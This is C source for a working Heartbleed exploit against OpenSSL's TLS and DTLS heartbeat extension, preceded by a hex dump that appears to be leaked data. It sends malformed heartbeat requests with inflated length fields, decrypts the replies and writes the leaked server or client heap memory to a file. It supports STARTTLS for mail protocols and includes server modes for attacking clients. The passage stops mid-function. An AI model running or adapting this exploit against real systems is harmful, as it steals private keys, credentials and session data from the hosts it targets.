000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D|\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"|\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;|\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\n* *\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\n* 0000054b\n* \n*/\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <signal.h>\n#include <netdb.h>\n#include <fcntl.h>\n#include <errno.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <inttypes.h>\n#include <openssl/bio.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <openssl/evp.h>\n#include <openssl/tls1.h>\n#include <openssl/rand.h>\n#include <openssl/buffer.h>\n\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\n\t\t(((unsigned int)(c[1])) )),c+=2)\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\n\nint first = 0;\nint leakbytes = 0;\nint repeat = 1;\nint badpackets = 0;\n\ntypedef struct {\n\tint socket;\n\tSSL *sslHandle;\n\tSSL_CTX *sslContext;\n} connection;\n\ntypedef struct {\n unsigned char type;\n short version;\n unsigned int length;\n unsigned char hbtype;\n unsigned int payload_length;\n void* payload;\n} heartbeat;\n\nvoid ssl_init();\nvoid usage();\nint tcp_connect(char*,int);\nint tcp_bind(char*, int);\nconnection* tls_connect(int);\nconnection* tls_bind(int);\nint pre_cmd(int,int,int);\nvoid* heartbleed(connection* ,unsigned int);\nvoid* sneakyleaky(connection* ,char*, int);\n\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\n\nint tcp_connect(char* server,int port){\n\tint sd,ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n host = gethostbyname(server);\n sd = socket(AF_INET, SOCK_STREAM, 0);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n bzero(&(sa.sin_zero),8);\n\tprintf(\"[ connecting to %s %d/tcp\\n\",server,port);\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\n\tif(ret==0){\n\t\tprintf(\"[ connected to %s %d/tcp\\n\",server,port);\n\t}\n\telse{\n\t\tprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\n\t\texit(0);\n\t}\n\treturn sd;\n}\n\nint tcp_bind(char* server, int port){\n\tint sd, ret, val=1;\n\tstruct sockaddr_in sin;\n\tstruct hostent *host;\n\thost = gethostbyname(server);\n\tsd=socket(AF_INET,SOCK_STREAM,0);\n\tif(sd==-1){\n \t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tmemset(&sin,0,sizeof(sin));\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\n\tsin.sin_family=AF_INET;\n\tsin.sin_port=htons(port);\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\n\tif(ret==-1){\n\t\tprintf(\"[!] cannot bind socket\\n\");\n\t\texit(0);\n\t}\n\tlisten(sd,5);\n\treturn(sd);\n}\n\nconnection* dtls_server(int sd, char* server,int port){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n\tint ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n\tunsigned long addr;\n if ((host = gethostbyname(server)) == NULL) {\n\t\tperror(\"gethostbyname\");\n\t\texit(1);\n\t}\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\n\t\tperror(\"bind()\");\n\t\texit(1);\n\t}\n\n\tBIO *bio;\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\n\n SSL_set_bio(c->sslHandle, bio, bio);\n SSL_set_accept_state (c->sslHandle);\n\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\n//\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nvoid ssl_init(){\n SSL_load_error_strings();\n SSL_library_init();\n OpenSSL_add_all_digests();\n OpenSSL_add_all_algorithms();\n OpenSSL_add_all_ciphers();\n}\n\nconnection* tls_connect(int sd){\n connection *c;\n\tc = malloc(sizeof(connection));\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n c->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n if(SSL_connect(c->sslHandle)!=1)\n ERR_print_errors_fp(stderr);\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n\treturn c;\n}\n\nconnection* dtls_client(int sd, char* server,int port){\n\tint ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n connection *c;\n\tmemset((char *)&sa,0,sizeof(sa));\n\tc = malloc(sizeof(connection));\n if ((host = gethostbyname(server)) == NULL) {\n\t\tperror(\"gethostbyname\");\n\t\texit(1);\n\t}\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\n if(sd==-1){\n\t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\n\t\tperror(\"connect()\");\n\t\texit(0);\n\t}\n\n\tBIO *bio;\n if(c==NULL){\n\t\tprintf(\"[ error in malloc()\\n\");\n\t\texit(0);\n\t}\n\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslHandle = SSL_new(c->sslContext);\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\n\n\tBIO_ctrl_set_connected(bio, 1, &sa);\n\tSSL_set_bio(c->sslHandle, bio, bio);\n\tSSL_set_connect_state (c->sslHandle);\n//printf(\"eshta\\n\");\n if(SSL_connect(c->sslHandle)!=1) \n ERR_print_errors_fp(stderr);\n\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway), %d \\n\",c->sslHandle->tlsext_heartbeat);\n }\n\treturn c;\n}\n\nconnection* tls_bind(int sd){\n\tint bytes;\n connection *c;\n char* buf;\n\tbuf = malloc(4096);\n if(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tmemset(buf,0,4096);\n\tc = malloc(sizeof(connection));\n\tif(c==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tc->socket = sd;\n c->sslHandle = NULL;\n c->sslContext = NULL;\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\n if(c->sslContext==NULL)\n ERR_print_errors_fp(stderr);\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\n\tSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \n\tif(!SSL_CTX_check_private_key(c->sslContext)){\n\t\tprintf(\"[!] FATAL: private key does not match the certificate public key\\n\");\n\t\texit(0);\n\t}\n\tc->sslHandle = SSL_new(c->sslContext);\n if(c->sslHandle==NULL)\n ERR_print_errors_fp(stderr);\n if(!SSL_set_fd(c->sslHandle,c->socket))\n ERR_print_errors_fp(stderr);\n int rc = SSL_accept(c->sslHandle);\n\tprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\n\tprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\n }\n return c;\n}\n\nint pre_cmd(int sd,int precmd,int verbose){\n\t/* this function can be used to send commands to a plain-text\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\n\tint rc, go = 0;\n\tchar* buffer;\n\tchar* line1;\n\tchar* line2; \n\tswitch(precmd){\n\t\tcase 0:\n\t\t\tline1 = \"EHLO test\\n\";\n\t\t\tline2 = \"STARTTLS\\n\";\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\tline1 = \"CAPA\\n\";\n\t\t\tline2 = \"STLS\\n\";\n\t\t\tbreak;\n\t\tcase 2:\n\t\t\tline1 = \"a001 CAPB\\n\";\n\t\t\tline2 = \"a002 STARTTLS\\n\";\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tgo = 1;\n\t\t\tbreak;\n\t}\n\tif(go==0){\n\t\tbuffer = malloc(2049);\n\t if(buffer==NULL){\n \tprintf(\"[ error in malloc()\\n\");\n \texit(0);\n\t }\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tprintf(\"[ banner: %s\",buffer);\n\t\tsend(sd,line1,strlen(line1),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t\tsend(sd,line2,strlen(line2),0);\n\t\tmemset(buffer,0,2049);\n\t\trc = read(sd,buffer,2048);\n\t\tif(verbose==1){\n\t\t\tprintf(\"%s\\n\",buffer);\n\t\t}\n\t}\n\treturn sd;\n}\n\nvoid* heartbleed(connection *c,unsigned int type){\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n\t\t\ts2n(0xffff,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\n OPENSSL_free(buf);\n\treturn c;\n}\n\nvoid* dtlsheartbleed(connection *c,unsigned int type){\n\n\tunsigned char *buf, *p;\n int ret;\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\n\tmemset(buf, '\\0', sizeof buf);\n\tif(buf==NULL){\n printf(\"[ error in malloc()\\n\");\n exit(0);\n }\n\tp = buf;\n *p++ = TLS1_HB_REQUEST;\n\tswitch(type){\n\t\tcase 0:\n\t\t\ts2n(0x0,p);\n\t\t\tbreak;\n\t\tcase 1:\n//\t\t\ts2n(0xffff,p);\n//\t\t\ts2n(0x3feb,p);\n\t\t\ts2n(0x0538,p);\n\t\t\tbreak;\n\t\tdefault:\n\t\t\tprintf(\"[ setting heartbeat payload_length to %u\\n\",type);\n\t\t\ts2n(type,p);\n\t\t\tbreak;\n\t}\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\n\tprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\");\n\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\n\n\tif (ret >= 0)\n\t\t{\n\t\tif (c->sslHandle->msg_callback)\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\n\t\t\t\tbuf, 3 + 16,\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\n\n\t\tdtls1_start_timer(c->sslHandle);\n\t\tc->sslHandle->tlsext_hb_pending = 1;\n\t\t}\n\n OPENSSL_free(buf);\n\n\treturn c;\n}\n\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned mac_size, orig_len;\n size_t extra;\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\n extra=SSL3_RT_MAX_EXTRA;\n else\n extra=0;\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n tls1_enc(s,0);\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\n\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n\tDTLS1_BITMAP *bitmap;\n\tunsigned int is_next_epoch;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned int mac_size, orig_len;\n\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = c->sslHandle;\n\nagain:\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n\n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n\t\t\tn2s(p,rr->epoch);\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\n\t\t\tp+=6;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\t\tif ( n != i)\n\t\t\t{\n\t\t\trr->length = 0;\n\t\t\ts->packet_length = 0;\n\t\t\tgoto again;\n\t\t\t}\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n\n\tbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\n\tif ( bitmap == NULL)\n\t\t{\n\t\trr->length = 0;\n\t\ts->packet_length = 0;\n\t\tgoto again;\n\t\t}\n\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\n\t\t !dtls1_record_replay_check(s, bitmap))\n\t\t\t{\n\t\t\trr->length = 0;\n\t\t\ts->packet_length=0;\n\t\t\tgoto again;\n\t\t\t}\n\n\tif (rr->length == 0) goto again;\nif (is_next_epoch)\n\t\t{\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\n\t\t\t{\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\n\t\t\t}\n\t\trr->length = 0;\n\t\ts->packet_length = 0;\n\t\tgoto again;\n\t\t}\n\n\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n\torig_len=rr->length;\n\n dtls1_enc(s,0);\n\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n\n 